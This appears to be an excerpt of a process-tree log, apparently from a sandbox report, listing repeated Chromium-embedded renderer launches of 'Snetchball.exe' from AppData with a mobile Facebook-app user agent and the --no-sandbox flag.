C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --mojo-platform-channel-handle=4308 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1128
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --mojo-platform-channel-handle=4432 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2496
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --mojo-platform-channel-handle=2580 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1972
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --mojo-platform-channel-handle=3796 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4328
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --mojo-platform-channel-handle=3956 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1792
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --mojo-platform-channel-handle=4416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2488
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --mojo-platform-channel-handle=744 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2056
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --mojo-platform-channel-handle=4380 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6072
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3620
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --mojo-platform-channel-handle=4496 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4804
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --mojo-platform-channel-handle=4504 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --mojo-platform-channel-handle=1256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3360
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --mojo-platform-channel-handle=4308 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6004
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --mojo-platform-channel-handle=4324 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1228
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --mojo-platform-channel-handle=4300 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1036
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1676
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=4144 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1044
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=2396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=1480 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3732
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=1220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2800
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5644
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --mojo-platform-channel-handle=4528 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1436
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --mojo-platform-channel-handle=2580 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:620
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=1276 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=1964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2092
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --mojo-platform-channel-handle=4524 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5384
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --mojo-platform-channel-handle=3844 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2152
-
